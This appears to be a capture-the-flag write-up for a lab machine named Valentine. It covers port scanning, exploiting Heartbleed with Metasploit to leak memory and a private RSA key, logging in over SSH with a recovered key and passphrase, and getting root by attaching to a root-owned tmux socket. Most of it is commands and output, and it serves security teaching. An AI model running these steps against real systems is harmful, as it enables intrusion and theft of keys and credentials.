# Enumeration
### NMAP
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
| 2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_ 256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesnt have a title (text/html).
443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after: 2019-02-06T00:45:25
|_ssl-date: 2021-05-13T09:00:42+00:00; +3m55s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: 3m54s
### Web Application
#Dirbuster
![[Pasted image 20210513120755.png]]#/dev/notes
To do:
1) Coffee.
2) Research.
3) Fix decoder/encoder before going live.
4) Make sure encoding/decoding is only done client-side.
5) Don't use the decoder/encoder until any of this is done.
6) Find a better way to take notes.
Both port 80 and 443 have the same functionality. The first thing we see is a woman and a bleeding heart. Weirdly enough there is an OpenSSL vulnerability called *[heartbleed](https://heartbleed.com)*.
# Exploit w/ Metasploit
I am running an auxiliary module to check if the vulnerability exists for this machine. Then I am going to exploit the vulnerability by dumping the information from the memory of the server.
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > exploit
[+] 10.10.10.79:443 - Heartbeat response with leak, 65535 bytes
[*] 10.10.10.79:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set action DUMP
action => DUMP
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > run
[+] 10.10.10.79:443 - Heartbeat response with leak, 65535 bytes
[+] 10.10.10.79:443 - Heartbeat data stored in /root/.msf4/loot/20210513073901_default_10.10.10.79_openssl.heartble_912349.bin
[*] 10.10.10.79:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
I am going to use *strings* to check the contents of the binary file produced by heartbleed. The output reveals a base64 text string.
$ sudo strings /root/.msf4/loot/20210513073901_default_10.10.10.79_openssl.heartble_912349.bin 1 ⨯
[sudo] password for kali:
0&J/
u8DF
ux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Referer: https://127.0.0.1/decode.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==
.Dl[
/m:t w
wHXpq
N[xckM
t]Sd
fwF)u`
1MC&
P0N0
["lr
["lr
'760{pu
.Dl[
/m:t w
wHXpq
N[xckM
The decoded version of the text value is ***heartbleedbelievethehype*** and I guess it is a passphrase.
$ printf "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" |base64 -d 1 ⨯
heartbleedbelievethehype
Next thing I wanna do is search for other actions that are available on this module.
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > show actions
Auxiliary actions:
Name Description
---- -----------
DUMP Dump memory contents to loot
KEYS Recover private keys from memory
SCAN Check hosts for vulnerability
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set action KEYS
action => KEYS
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > run
[*] 10.10.10.79:443 - Scanning for private keys
[*] 10.10.10.79:443 - Getting public key constants...
[*] 10.10.10.79:443 - 2021-05-13 11:42:28 UTC - Starting.
[*] 10.10.10.79:443 - 2021-05-13 11:42:28 UTC - Attempt 0...
[+] 10.10.10.79:443 - 2021-05-13 11:42:30 UTC - Got the private key
[*] 10.10.10.79:443 - -----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAwygXrPgZKkHSij/OeRwZ9PtI+tMvM2tvyJz5o78ZZqihjfki
Yg7hnkVQH1kvrLqVz68jqlTJZEAPJajF3cvEHIcM0nMSLnd2z4lI+zlK4fU9QMO1
moJo9o2Msk0/TwMJwLqtdF1TZLBXakQPH7f2+wWIrrLByt6m+8Vmd0YpdWDQr5Hd
WTA6C4+FIeVdyCIcVup6Lw0nXOKn1i5VRheHItUbZmIlhfoJHDhtGxSeqXrgMU1D
Js6wkebQm0jYz095+a8SRNRl5P93R1aFTTvprdtN6y0pl/hampnDrRcabHOkBB/l
1Y6ox6YgrorgULjxstJI3n2ziQ226G3Ho4JelwIDAQABAoIBAQCWkqd5wE6CSRjt
q/9deC4a04riY/CmJr2vtlXyXi52A6Pqi49YwwyW9fm0xjY/ehK+k+3brOFZ5QcK
0mYgE+iy7gwZj8k2atwTkmPp2bGKF5J0FsxWc0oS+PHWXD19c+Wheyb7gkomhNxd
VDerDGCWGxXzXF6jbRi/ZvYBDvRL59YOvXmdQa3MKykGywUn+NFZvUxICyEma24K
5ABMIWm5cTmDzm5Cd5/wn5Pu4tY0TIzfoa3KnA+M8vpmd4xgRGWGpatFKrM3LqSq
W0+Rr81Ty/R7lr1DkLDKp1ltvCl3pp1Lkoo3Ublk38C6gHHS3Vfs6h+QJfNgjeQu
RyKqm3H5AoGBAPFMTE9WpalFjB0u+hHNbFRfRet8480wa5702AEDK/cHi0U+R9Z0
Va/qm7PtzBP/m4nUXJwZbvG9O2PKXusGmgIBc/jqSQpQriIvBb27AJiq65Jd7tJ4
AiNZm6v/bFChFmWhdZe1S4vBgnlYoRWHsu+3JJpMJFKZYYl9O/X8ZWdtAoGBAM8M
F8KO2EtVQUrosnZQfn+2pLbY4n4Q66N3QaBeoqY7UipBJ1r3jIfupiw5+M1gEXvB
gnQmRLwRAA7Wmsh0/eCxeOk7kgNr7W8nNdxwp0Uv06h1CtEqvFIuXab5pYG5/QKs
habSXxY02QuaVgM/vXBTSOO0TC/7Rm6ORJzAxAeTAoGBAOakinBvnwuMmaAvjgJE
O57uLlQoXUp9VPFskaduE7EdOecm393B90GeW9QBoccf1NlK7naa7OwOd90ry8yU
09LE9shfkQ9WDQxJrBAt1iUXgvK17Jiq80g818rw6+SqBVGBongvZ5WfkwpQSDDf
M49knI0L6NA3If8cgJrg9UCFAoGBAK1DJmL23MP13UTNhAKEi8deVWp6BteOW1KZ
Cr8kUqIfRDv99+wk+mIKcN7TyIQ9H4RbxEpkd+KVq2G/bxnO5WFxwogTBLZ+S9xX
iLgnQaMhSdNP1rSBOcTf7hk8EqeDt9nT+6hFpbLUmMkf51iir2nfGEEM8TC56w+7
WGmA2sqnAoGAUyztn0Sc08xny1oGQXjVcVy/KsszYNfaF2y4i6tsbDsD2HfzRvbp
zeSeXxopyjjMTKCIMONh88JFeJoctmsLg2eG3uFw5c+wvD+GBafFfufvf2Xz183h
05q+RVlBncSiUayk33RtWi0Csl9L3prrGKh9RLUBmkSZ/E90ATxE92w=
-----END RSA PRIVATE KEY-----
[*] 10.10.10.79:443 - Private key stored in /root/.msf4/loot/20210513074230_default_10.10.10.79_openssl.heartble_001596.txt
[*] 10.10.10.79:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Now that I had a passphrase and a private key, I tried to login with usernames such as admin, bleed, heart, heartbleed, bleedheart, valentine and others. In the end I had to enumerate where I was mistaken and figured out that I had missed something. In the /dev/ directory there is a secondary file called *hype_key* which not only contains a HEX value of a private key but it also tells me that the owner of the private key's name is ***hype***. I have inserted the hex value to a hex-to-text and received a second private key. Now all I have done is copied the private key to a file, changed its premissions to 600 and sshed to the box with the previously found passphrase.
# ssh -i web_key [email protected]
Enter passphrase for key 'web_key':
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)
* Documentation: https://help.ubuntu.com/
New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3
hype@Valentine:~$
There are many ways to achieve root on the machine. The output from the *linuxprivchecker.py* revealed SUID files of interest, processes such as tmux(owned by root) running a *dev_sess* socket and DirtyCow kernel exploit among others. I have chosen to go with the tmux one to save up some time.
hype@Valentine:~/Desktop$ ps aux
...snip...
root 1020 0.0 0.1 26416 1672 ? Ss 01:59 0:05 /usr/bin/tmux -S /.devs/dev_sess
...snip...
hype@Valentine:~/Desktop$ tmux -S /.devs/dev_sess
root@Valentine:/home/hype/Desktop# whoami
root
0 Comments
Recommended Comments
Няма коментари